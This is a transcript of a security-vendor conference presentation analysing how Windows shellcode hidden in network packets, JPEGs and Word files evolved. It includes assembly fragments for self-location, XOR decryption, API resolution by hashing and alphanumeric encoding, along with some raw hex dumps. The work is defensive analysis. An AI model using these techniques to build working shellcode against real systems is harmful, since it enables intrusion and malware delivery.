Transcript Evolving Shellcode

Evolving Shellcode
on Windows
Masaki Suenaga
Symantec Security Response Tokyo
(1) Shell code with vulnerability
(2) What shell code does
(3) Evolution history
(4) Future
2
w/ Spybot
!?
In the network packet
JPEG
Animation
Cursor
September 2004
February 2005
Word
Document
March 2005
3
Shell code in a network packet
Decrypts the code by XOR-ing with 99h.
Gets the base address of the already loaded
KERNEL32.DLL.
Resolves the addresses of necessary API entries.
Creates a socket.
Connects to the attacker's PC.
Calls CreateProcess, with STARTUPINFO.hStdInput,
hStdOutput and hStdError is set to the socket.
4
Welcome to this clean home page!
Shell code in a JPEG file
Microsoft GDI+ Library JPEG
Segment Length Integer Underflow
vulnerability
JPEG
JPEG
Just viewing a malicious web
page can download and execute
a malicious program.
JPEG
5
Dear Sir,
We will revise our
wholesale prices.
Shell code
in Word document
Please see the
attached document
for details.
Sincerely Yours
Word document
6
(1) Shell code with vulnerability
(2) What shell code does
(3) Evolution history
(4) Future
7
1. Locating itself on memory
ADDRESS1: CALL ADDRESS3
ADDRESS2: some pieces of code
ADDRESS3: POP EBX
EBX points to ADDRESS2
Then,
LEA ESI, [EBX+14h] (example)
8
2. Decrypting
ADDRESS1: MOV ECX,100
ADDRESS2: LEA ESI,[EBX+20]
ADDRESS3: MOV EDI,ESI
ADDRESS4: LODSB
ADDRESS5: XOR AL,99h
ADDRESS6: STOSB
ADDRESS7: LOOP ADDRESS4
for(c=0; c<100; c++)
{
*lpData =
*lpData ^ 0x99;
lpData++;
}
XOR, ADD or SUB alone is often used.
9
3. Resolving API
ADDRESS1: MOV EAX, FS:[30h]
ADDRESS2: MOV EAX, [EAX+0Ch]
ADDRESS3: MOV ESI, [EAX,1Ch]
ADDRESS4: LODSD
ADDRESS5: MOV EBP, [EAX+8]
;EAX = 7FFDF000h
;EAX = 00191EA0h
;EAX = 00191F58h
;EAX = 00192020h
;EAX = 77E60000h
(KERNEL32.DLL)
LoadLibrary
GetProcAddress
Refer to "Understanding Windows Shellcode" by skap
10
3. Resolving API (2)
ADDRESS1: XOR EBX, EBX
ADDRESS2: MOV EAX, FS:[EBX] ;EAX = 006FFE0h
ADDRESS3: INC EAX
ADDRESS4: XCHG EAX, EBX
ADDRESS5: MOV EAX, [EBX-1] ;EAX = 0FFFFFFFFh
ADDRESS6: INC EAX
ADDRESS7: JNZ ADDRESS4
ADDRESS8: MOV EDX, [EBX+3] ;EAX = 77E94809h
ADDRESS9: XOR DX, DX
ADDRESS10: MOV AX, 1000h
ADDRESS11: CMP WORD PTR [EDX],'ZM'
ADDRESS12: JZ FOUND
;EDX = 77E60000h (KERNEL32.DLL)
ADDRESS13: SUB EDX, EAX
ADDRESS14: JMP ADDRESS11
GetProcAddress(hKernel32,
FOUND:
“CreateFileExA”)
11
4. Executing payload – downloading or dropping
hFile = 0
GetFileSize(hFile)
Size == 0x34D87?
YES
hFile = hFile + 4
FOUND
How to find the host file handle
12
4. Executing payload - backdoor
Internet Explorer
Image file
Backdoor
13
(1) Shell code with vulnerability
(2) What shell code does
(3) Evolution history
(4) Future
14
1. Decrypting shell
void decrypt(DWORD *lpdwData)
{
int pos;
for(pos=0; ; pos++) {
if(lpdwData[pos] == 0xFF773311)
break;
if(lpdwData[pos] & 1) == 0){
lpdwData[pos] ^= 0x16D4A07;
}
else{
lpdwData[pos] ^= 0x42BC4B2;
}
}
}
15
2. Checksum API resolving shell
(1) Checksum Method 1 (Right-Rotation 13 w/o null terminator, ADDing)
XOR EDI,EDI
XOR EAX,EAX
LOOP_NEXT:
LOSB
OR EAX,EAX
JZ END_LOOP
ROR EDI, 13
ADD EDI, EAX
JMP LOOP_NEXT
END_LOOP:
(3) Checksum Method 3 (Right-Rotation 13 w/ null terminator, ADDing)
XOR EDI,EDI
XOR EAX,EAX
LOOP_NEXT:
LOSB
ROR EDI, 13
OR EAX,EAX
JZ END_LOOP
ADD EDI, EAX
JMP LOOP_NEXT
END_LOOP:
(2) Checksum Method 2 (Left-Rotation 7 w/o null terminator, XORing)
XOR EDI,EDI
XOR EAX,EAX
LOOP_NEXT:
LOSB
OR EAX,EAX
JZ END_LOOP
ROL EDI, 7
XOR EDI, EAX
JMP LOOP_NEXT
END_LOOP:
(4) Checksum Method 4 (Left-Rotation 7 w/ null terminator, XORing)
XOR EDI,EDI
XOR EAX,EAX
LOOP_NEXT:
LOSB
ROL EDI, 7
OR EAX,EAX
JZ END_LOOP
XOR EDI, EAX
JMP LOOP_NEXT
END_LOOP:
16
FIG. 1-1
METHOD 1 and METHOD 3 (Right-rotation, ADDing)
Rotation
count
1
2
3
4
5-7
8
9-11
12
13-15
16
17-19
20
21-23
24
25-27
28
29
30
31
kernel32.dll
7
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
urlmon.dll
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
ntdll.dll
10
0
0
0
0
0
0
0
0
13
0
0
0
0
0
0
1
0
20
advapi32.dll
20
2
0
0
0
2
0
0
0
7
0
0
0
0
0
0
6
26
47
user32.dll
0
0
0
1
0
1
0
1
0
5
0
1
0
1
0
1
0
0
0
wsock32.dll
1
0
0
0
0
0
0
0
0
2
0
0
0
0
0
0
0
0
0
ws2_32.dll
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
17
FIG.1-2
METHOD 2 and METHOD 4 (Left-rotation, XORing)
Rotation
count
1
2
3
4
5-7
8
9-11
12
13-15
16
17-19
20
21-23
24
25-27
28
29
30
31
kernel32.dll
4
0
0
0
0
0
0
0
0
24
0
0
0
0
0
0
0
0
0
urlmon.dll
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
ntdll.dll
11
0
0
0
0
0
0
0
0
7
0
0
0
0
0
0
0
0
8
advapi32.dll
44
25
5
0
0
2
0
0
0
22
0
0
0
2
0
0
0
1
21
user32.dll
2
0
0
1
0
1
0
1
0
12
0
1
0
1
0
1
0
0
0
wsock32.dll
1
0
0
0
0
0
0
0
0
2
0
0
0
0
0
0
0
0
1
ws2_32.dll
3
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
ClientToScreen and ScreenToClient (user32.dll)
SystemFunction001 and SystemFunction040 (advapi32.dll)
SystemFunction002 and SystemFunction041 (advapi32.dll)
Observed collisions in every multiple of 4
18
3. Code obfuscating shell
Where is ebx + 40112Dh?
push 1
lea ecx, [ebx+40112Dh] ; file name?
nop
push ecx
push edx
call dword ptr [ebx+401191h] ; API?
19
ADDR0001DF4E call
ADDR0001DF53 pop
ADDR0001DF54 sub
ADDR0001DF5A jmp
ADDR0001DF53
ebx
ebx, 4010A6h ; ebx = -3e3153h
;
(1DF53h - 4010A6h)
loc_1E068
loc_1E068
;some pieces of code
ADDR0001E097 mov [ebx+401185h], ebx ; [ADDR0001E032] = EBX
ADDR0001E09D lea edx, [ebx+4010B2h] ; EDX = offset
ADDR0001DF5F
;some pieces of code
ADDR0001E0F4 mov ebx, [edx+0D3h] ; ebx = (-3e3153h)
; 1DF5Fh+0D3h = 1E032h
[ebx+401191h] is CopyFileA
20
5. Host modifying shell
Miracle cure...? No, alas, it is too late to save you.
21
push
push
mov
push
mov
push
call
push
push
call
mov
push
lea
push
mov
file)
push
push
push
call
0
; FILE_BEGIN
0
eax, [ebp-4Ch] ; offset dropped_binary
eax
eax, [ebp-50h] ; hFileDocument
eax
dword ptr [esi+0Ch] ; SetFilePointer
40000h
40h
dword ptr [esi+20h] ; GlobalAlloc
[ebp-4], eax ; lpMem
0
; lpOverlapped
eax, [ebp-58h] ; nNumberOfBytesWritten
eax
eax, [ebp-48h] ; 24B87h (size of dropped
SetFilePointer(hFile,
lpDroppedFile,0,0)
lpMem = GlobalAlloc
(0x40,0x40000)
WriteFile(hFileDocument,
lpMem,0x24B87,
&cbWritten,0)
eax
dword ptr [ebp-4] ; lpMem
dword ptr [ebp-50h] ; hFileDocument
dword ptr [esi+8] ; WriteFile
22
6. ASCII shell
Where have they gone?
Hex values
90 90 90 90
90 90 6A 7F
82 01 01 83
05 42 79 0D
90
59
EB
0B
90
D9
FC
C2
90
EE
E2
0D
90
D9
F4
8A
90
74
7C
F0
90
24
B1
9E
90
F4
DA
AC
90
5B
B2
8A
90
81
B0
E8
90
73
E6
8A
90
13
8A
EA
90
80
02
08
ASCII characters
................
..j.Y...t$.[.s..
........|.......
.By.............
23
FIG.2
43
91
98
42
F8
49
6A
41
4B
4C
4B
4C
37
4A
48
9F
92
49
43
32
32
66
63
7A
4B
96
FC
91
EB
49
58
41
30
61
35
39
97
27
47
48
03
49
50
41
30
4B
6B
4F
99
98
F9
47
59
49
30
30
5A
30
58
69
9F
F5
27
F8
EB
48
41
41
32
47
6A
6C
99
F9
FC
43
05
49
31
41
6A
44
4B
59
90
37
3F
4A
E8
49
41
58
46
34
6B
5A
F9
47
48
F5
F8
49
42
50
53
4A
4F
63
FD
93
90
3F
FF
49
6B
38
78
4D
6B
49
43
96
46
49
FF
49
42
42
49
49
4F
6D
46
3F
3F
48
FF
49
41
42
30
6D
79
70
99
FC
F9
97
49
49
53
75
66
32
6F
38
4F
27
43
4F
49
49
42
4A
4E
7A
74
6C
4E
47
2F
9F
49
51
32
49
59
5A
30
69
4A
99
40
4B
49
5A
42
6A
57
6A
30
6D
C7K.......CF.ONJ
.J.'...7G..?.'G.
.H.G.'.?H.F?.C/@
B..HG.CJ.?IH.O.K
....Y.......IIII
IIIIIHIIIIIIIIQZ
jCXP0A1ABkBASB2B
A2AA0AAXP8BBuJIj
K200Z2jFSxI0fNYW
LfaK0GD4JMIm2zZj
Kc5kXjKkOkOyot00
Lz9OilYZcImp8lim
Just an
ASCII text
24
43
37
4B
97
99
9F
99
90
F9
FD
43
inc ebx
aaa
dec ebx
xchg eax, edi
cdq
lahf
cdq
nop
stc
std
inc ebx
F8 92 EB 03 59 EB 05 E8 F8 FF FF FF 49 49 49 49
49 49 49 49 49 48 49 49 49 49 49 49 49 49 51 5A
....Y.......IIII
IIIIIHIIIIIIIIQZ
25
00000ADC 49
dec ecx
00000ADD 49
dec ecx
; ecx = 0xABB
00000ADE 51
push ecx
00000ADF 5A
pop edx
; edx = 0xABB
00000AE0 6A 43
push 43h
00000AE2 58
pop eax
; eax = 0x43
00000AE3 50
push eax
00000AE4 30 41 31 xor [ecx+31h], al ; XOR byte ptr [0xAEC],43h
00000AE7 41
inc ecx
; ecx = 0xABC
00000AE8 42
inc edx
; edx = 0xABC
00000AE9 6B 42 41 53 imul eax, [edx+41h], 53h ; 53h was modified to 10h
; imul eax,[edx+10h] ...[0xAFD]
; AL=0xA0
00000AED 42
inc edx
; edx = 0xABD
00000AEE 32 42 41 xor al, [edx+41h] ; AL = 0xA0 XOR 0x49 (== 0xE9)
00000AF1 32 41 41 xor al, [ecx+41h] ; AL = 0xE9 XOR 0x4A (== 0xA3)
00000AF4 30 41 41 xor [ecx+41h], al ; [0xAFD] = 0x4A XOR 0xA3 (== 0xE9)
00000AF7 58
pop eax
; eax = 0x43
00000AF8 50
push eax
00000AF9 38 42 42 cmp [edx+42h], al ; cmp 0x49,0x43
00000AFC 75 4A
jnz loc_0B48
; 4Ah was modified to 0E9h
26
FIG.3
10E0
10F0
1100
1110
1120
1130
1140
1150
1160
4A
4E
F8
37
48
27
91
BC
F2
43
93
F8
40
91
FC
F6
92
9E
4F
92
FD
49
90
6A
B1
03
48
48
90
97
99
37
3C
83
E7
A5
93
43
4E
F5
4F
59
EB
4F
EC
91
96
9B
F8
37
D9
FC
E7
A9
F9
47
41
F8
FC
EE
E2
D6
04
F9
4B
F8
42
2F
D9
F4
B2
C5
F8
91
46
4B
D6
74
2F
31
CC
4F
48
FC
FD
49
24
C5
A2
50
98
96
93
96
4A
F4
7D
3F
3D
90
FC
FC
46
4E
5B
C4
F8
BC
37
42
3F
47
FC
81
F8
85
C7
D6
40
48
FD
FD
73
1A
3C
4B
F9
D6
46
37
FC
13
82
C5
B6
D6
91
F5
90
90
C4
84
6A
5A
JCOH.....O..7...
N...C.GK.H..B@..
....N.A.F...?HF.
[email protected].
H..7O7./.IJN....
'.j<Y...t$.[.s..
......../.}.....
....O...1.?..<.j
..H......P=..K.Z
Looks like a part of WMF file…
27
7. DBCS-to-Unicode conversion shell
GB-2312
CE B7 C0 C5 C6 DF B4 D9 DF 5F 95 84
INTO
MOV BH, 0C0h
DB 0C5h
MOV BH, 0B4h
FSTP ST(7)
POP EDI
XCHG EAX,EBP
TEST CL, CH
28
7. DBCS-to-Unicode conversion shell
GB-2312
CE B7 C0 C5 C6 DF B4 D9 DF 5F 95 84
Unicode
4F 75
05 74
03 4E
C3 4F
54 90 5E 66
* DBCS = Double Byte Character Set
29
DEC EDI
JNZ LABEL1
JZ
LABEL1
DEC ESI
RETN
DB 4Fh
LABEL1:
PUSH ESP
NOP
POP ESI
LODSW
In Unicode
30
(1) Shell code with vulnerability
(2) What shell code does
(3) Evolution history
(4) Future
31
1. Large host file
32
2. With a special weapon
2-1. MMX instruction using shell
2-2. Packed shell
2-3. Location limiting shell
33
3. Hard to kill
34
4. Hiding
35
5. Many eggs
36
6. Various variants
37
7. Parasite
7-1. Injecting shell
7-2. File infecting shell
HELP
JPEG
JPEG
EXE
38
8. Living in a niche
8-1. Environment-dependent shell
39
9. Mimic
Hello,
Next shell code
This is a
Clean file
(First shell code)
XOR
Welcome
(Binary data)
If you have any
Question, please
Looks as if a corrupted file…
If it is large and with a lot of
dummy binary data…
40
CONCLUSION
Traditionally, data files are not supposed to
contain program code. Shell code has been
evolving month after month, but it cannot
elude us as long as we can locate
the initial point of execution.
We can be optimistic in this sense.
At the same time, we have to pay attention
to the way shell code behaves; otherwise
it may go far beyond our current assumptions.
41